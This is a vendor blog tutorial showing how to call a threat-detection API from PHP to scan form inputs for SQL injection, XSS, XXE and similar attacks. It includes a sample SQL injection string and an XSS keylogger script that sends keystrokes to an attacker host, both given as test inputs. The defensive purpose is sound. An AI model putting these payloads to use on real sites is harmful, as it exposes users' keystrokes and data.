How to Prevent Multiple Threats from Text Inputs in PHP

Cloudmersive
May 17, 2024

Our web applications’ text input fields represent a significant attack surface, and we need to carefully check those inputs for potential threats.

Thankfully, using the ready-to-run PHP examples below, we can take advantage of a free low-code threat detection API capable of identifying multiple common threat types from a text input string.

We can use this solution to identify the following threats:

  1. JSON Insecure Deserialization
  2. Cross-Site Scripting
  3. XML External Entities
  4. SQL Injection
  5. Server-Side Request Forgery URLs

We can test this on our own with generic (inert) threat strings in each threat category. For example, if we test with the basic SQL Injection string below:

' OR '1'='1

We’ll receive the following API response:

{
"Successful": true,
"CleanResult": false,
"ContainedJsonInsecureDeserializationAttack": false,
"ContainedXssThreat": false,
"ContainedXxeThreat": false,
"ContainedSqlInjectionThreat": true,
"ContainedSsrfThreat": false,
"IsXML": false,
"IsJSON": false,
"IsURL": false,
"OriginalInput": "' OR '1'='1"
}

And if we test with a basic XSS example:

<script>
document.onkeypress = function(e) {
var xhttp = new XMLHttpRequest();
xhttp.open("POST", "http://attacker.com/log", true);
xhttp.send("key=" + e.key);
};
</script>

We’ll get the following response:

{
"Successful": true,
"CleanResult": false,
"ContainedJsonInsecureDeserializationAttack": false,
"ContainedXssThreat": true,
"ContainedXxeThreat": false,
"ContainedSqlInjectionThreat": false,
"ContainedSsrfThreat": false,
"IsXML": false,
"IsJSON": false,
"IsURL": false,
"OriginalInput": "<script>\ndocument.onkeypress = function(e) {\n var xhttp = new XMLHttpRequest();\n xhttp.open("
}

The “CleanResult”: false value indicates that a threat was identified, and the Boolean values that follow it specify which threat type was detected. After those come flags for the type of input processed (XML data, JSON data, or a URL), and the original input is repeated at the very end.
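One way to act on these fields, as an added example that is not Cloudmersive's code: a fail-closed check over the raw JSON response body, which allows input only when the scan succeeded and reported a clean result. The function name `evaluateThreatResponse` is hypothetical, the field names are the ones shown in the responses above, and the sample bodies (including a clean response with "CleanResult": true) are constructed for illustration.

```php
<?php
declare(strict_types=1);

// Threat flags as named in the API responses shown above.
const THREAT_FLAGS = [
    'ContainedJsonInsecureDeserializationAttack',
    'ContainedXssThreat',
    'ContainedXxeThreat',
    'ContainedSqlInjectionThreat',
    'ContainedSsrfThreat',
];

// Hypothetical helper: turn a raw JSON response body into an allow/deny decision.
// Fails closed: anything other than a well-formed, explicitly clean result is denied.
function evaluateThreatResponse(string $body): array
{
    $data = json_decode($body, true);
    if (!is_array($data)) {
        return ['allow' => false, 'reason' => 'unparseable response', 'threats' => []];
    }
    if (($data['Successful'] ?? null) !== true) {
        return ['allow' => false, 'reason' => 'scan did not succeed', 'threats' => []];
    }
    // Collect every flag that is strictly true; more than one may be set.
    $threats = array_values(array_filter(
        THREAT_FLAGS,
        fn (string $flag): bool => ($data[$flag] ?? false) === true
    ));
    // Require CleanResult to be strictly true AND no individual flag set.
    $clean = ($data['CleanResult'] ?? null) === true && $threats === [];
    return [
        'allow'   => $clean,
        'reason'  => $clean ? 'clean' : ($threats ? 'threat detected' : 'not marked clean'),
        'threats' => $threats,
    ];
}

// Constructed samples: an SQL injection response, a clean response, and a truncated body.
$samples = [
    'sqli'      => '{"Successful":true,"CleanResult":false,"ContainedSqlInjectionThreat":true,"OriginalInput":"\' OR \'1\'=\'1"}',
    'clean'     => '{"Successful":true,"CleanResult":true,"ContainedSqlInjectionThreat":false,"OriginalInput":"hello"}',
    'truncated' => '{"Successful":true,"CleanResult":tr',
];
foreach ($samples as $name => $body) {
    $d = evaluateThreatResponse($body);
    // Log the decision only; never echo OriginalInput back into an HTML page unescaped.
    printf("%-9s allow=%s reason=%s threats=%s\n", $name, $d['allow'] ? 'yes' : 'no', $d['reason'], implode(',', $d['threats']));
}
```

A clean result is one signal among several: parameterized queries and output encoding still apply to input that passes this check.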

Before we copy code examples to call this API, let’s first grab a free API key to authorize our requests. With a free Cloudmersive API key, we’ll be able to make up to 800 API calls per month with zero additional commitments.

Let’s now install the PHP client with Composer by executing the following command:

composer require cloudmersive/cloudmersive_security_api_client

After that, let’s copy the below code examples to call the multi-threat detection function:

<?php
require_once(__DIR__ . '/vendor/autoload.php');

// Configure API key authorization: Apikey
$config = Swagger\Client\Configuration::getDefaultConfiguration()->setApiKey('Apikey', 'YOUR_API_KEY');

$apiInstance = new Swagger\Client\Api\ContentThreatDetectionApi(
    new GuzzleHttp\Client(),
    $config
);
$value = "value_example"; // string | User-facing text input.

try {
    // Send the text input for scanning and print the threat detection result
    $result = $apiInstance->contentThreatDetectionAutomaticThreatDetectionString($value);
    print_r($result);
} catch (Exception $e) {
    echo 'Exception when calling ContentThreatDetectionApi->contentThreatDetectionAutomaticThreatDetectionString: ', $e->getMessage(), PHP_EOL;
}
?>

And that’s all there is to it — no more code required! We can now protect our web applications from a few different text input threats with a single low-code solution.
